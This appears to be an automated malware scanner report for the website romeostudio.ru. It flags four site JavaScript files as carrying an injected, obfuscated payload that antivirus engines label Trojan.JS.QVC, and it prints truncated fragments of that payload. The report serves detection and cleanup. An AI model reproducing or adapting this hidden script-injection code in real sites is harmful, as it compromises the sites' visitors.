New scan:

Malware Scanner report for romeostudio.ru

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://romeostudio.ru/
200 OK
Content-Length: 13355
Content-Type: text/html
clean
http://romeostudio.ru/str/offers.js
200 OK
Content-Length: 3020
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function showhide(id)
{
if(document.getElementById('text'+id).style.display=='none')
{
document.getElementById('indet'+id).innerHTML='Ñêðûòü òåêñò';
document.getElementById('text'+id).style.display='inline';
document.getElementById('indet'+id).style.background='url(/images/uparr.gif) right 2px no-repeat';
}
else{
document.getElementById('indet'+id).innerHTML='Ïîäðîáíåå';
document.getElementById('text'+id).style.display='none';
document.getEl
... 1423 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://romeostudio.ru/str/estim.js
200 OK
Content-Length: 3115
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function active(name,est){
document.getElementById(name+'1').className='';
document.getElementById(name+'2').className='';
document.getElementById(name+'3').className='';
document.getElementById(name+'4').className='';
document.getElementById(name+'5').className='';
for(i=1;i<=est;i++)
{
document.getElementById(name+i).className='act';
}
}
function clearest(name){
document.getElementById(name+'1').className='';
docume
... 1534 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://romeostudio.ru/popup/popup.js
200 OK
Content-Length: 2930
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function work(id, width, height)
{
window.open('/popup/work.php?id='+id,'photo','(menubar=no,scrollbars=no,status=no, width='+width+', height='+height+')')
}
function master(id, width, height)
{
window.open('/popup/master.php?id='+id,'photo','(menubar=no,scrollbars=no,status=no, width='+width+', height='+height+')')
}
function photo(id, width, height)
{
window.open('/popup/photo.php?id='+id,'photo','(menubar=no,scrollbars=no,status=no, width='+width+', hei
... 1346 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://romeostudio.ru/js/swfobject.js
200 OK
Content-Length: 11973
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var flashEnable = 0;
if(typeof deconcept == "undefined") var deconcept = new Object();
if(typeof deconcept.util == "undefined") deconcept.util = new Object();
if(typeof deconcept.SWFObjectUtil == "undefined") deconcept.SWFObjectUtil = new Object();
deconcept.SWFObject = function(swf, id, w, h, ver, c, quality, xiRedirectUrl, redirectUrl, detectKey) {
if (!document.getElementById) { return; }
this.DETECT_KEY = detectKey ? detectKey : 'detectflash';
this.skipDetect =
... 3238 bytes are skipped ...
_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+$.__+$.$$$_+"(\\\"<\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\\"+\\\"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"\\"+$.$__+$.___+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='"+$.$$$$+$.__+"\\"+$.__$+$.$$_+$.___+":

Antivirus reports:

Ad-Aware
Trojan.JS.QVC
Ikarus
Trojan.Script
nProtect
Trojan.JS.QVC
Emsisoft
Trojan.JS.QVC (B)
MicroWorld-eScan
Trojan.JS.QVC
NANO-Antivirus
Trojan.Script.IFrame.bbcbap
F-Secure
Trojan.JS.QVC
GData
Trojan.JS.QVC
BitDefender
Trojan.JS.QVC

http://romeostudio.ru/pages/8/
200 OK
Content-Length: 25780
Content-Type: text/html
clean
http://romeostudio.ru/pages/8/swfobject.js
404 Not Found
Content-Length: 351
Content-Type: text/html
clean
http://romeostudio.ru/test404page.js
404 Not Found
Content-Length: 351
Content-Type: text/html
clean
http://romeostudio.ru/pages/71/
200 OK
Content-Length: 26395
Content-Type: text/html
clean
http://romeostudio.ru/pages/71/swfobject.js
404 Not Found
Content-Length: 351
Content-Type: text/html
clean
http://romeostudio.ru/pages/75/
200 OK
Content-Length: 17141
Content-Type: text/html
clean
http://romeostudio.ru/pages/75/swfobject.js
404 Not Found
Content-Length: 351
Content-Type: text/html
clean
http://romeostudio.ru/pages/14/
200 OK
Content-Length: 15389
Content-Type: text/html
clean
http://romeostudio.ru/pages/14/swfobject.js
404 Not Found
Content-Length: 351
Content-Type: text/html
clean
http://romeostudio.ru/pages/13/
200 OK
Content-Length: 12442
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: romeostudio.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Tue, 13 Jan 2015 08:51:34 GMT
Pragma: no-cache
Server: DataPalm/3.5
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=fa4450b424ff2eb1d644c5bcd9f841bf; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: romeostudio.ru
Referer: http://www.google.com/search?q=romeostudio.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=romeostudio.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://romeostudio.ru/

Result: romeostudio.ru is not infected or malware details are not published yet.